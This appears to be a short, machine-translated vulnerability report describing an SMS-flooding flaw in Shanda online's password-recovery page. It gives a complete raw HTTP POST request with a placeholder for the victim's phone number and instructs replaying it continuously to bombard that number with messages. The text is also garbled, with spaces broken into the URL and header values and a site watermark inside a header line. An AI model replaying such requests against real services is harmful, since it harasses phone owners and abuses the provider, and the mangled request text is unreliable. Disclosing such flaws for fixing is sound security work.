Brief description:
SMS ddos Attack Vulnerability in Shanda online
Detailed description:
Shanda online will send a verification code to the mobile phone when the password is forgotten. URL:
Http://pwd.sdo.com/ptinfo/safecenter/getpwd/ChgPwdStepOldPwd.aspx? Showbindmobile = 1
Mobile phone numbers can be controlled at will, and sms ddos attacks can be carried out without quantity control.
Proof of vulnerability:
POST/ptinfo/safecenter/Controls/IPwd. aspx HTTP/1.1
Host: pwd.sdo.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv: 6.0.1) Gecko/20100101 Firefox/6.0.1
Accept :*/*
Accept-Language: zh-cn, zh; q = 0.5
Accept-Encoding: gzip, deflate
Accept-Charset: GB2312, UTF-8; q = 0.7, *; q = 0.7
Proxy-Connection: keep-alive
Content-Type: application/x-www-form-urlencoded; charset = UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://pwd.sdo.com/ptinfo/safecenter/getpwd/ChgPwdStepOldPwd.aspx? Showbindmobile = 1
Content-Length: 444 www.2cto.com
Cookie: ASP. NET_SessionId = rfuowv55tuqwmgifvidao255; B _t_s = t115065872973xs; sdo_beacon_id = signature; CaptchaSeq = kgWVVswyQC6C55eS
Pragma: no-cache
Cache-Control: no-cache
At = GetPwdMobileSendCode & source = S & pt = & ekey = & ekey1 = & ekey2 = & ekey3 = & ekey4 = & ecard1 = & ecard2 = & ecard3 = & phone = [Replace target mobile phone number] & code = & imgcode = & email = & mobile = & mobilecode = & emailcode = & regname = & regidcard = & regemail = & regmobile = & regtel = & regbirthday = & regquestion1 = & region = & regquestion2 = & region = & adultname = & region = & orgpwd = & signarea = & firstgame = & signtime = & stolentime = & hispwd = & oldpwd = & newpwd = & newpwd2 = & days = & selectunbind = & uploadpic = & custompwd = & a = & randomcode =
Continuously replays the preceding data packets to launch DDOS attacks.
Author mog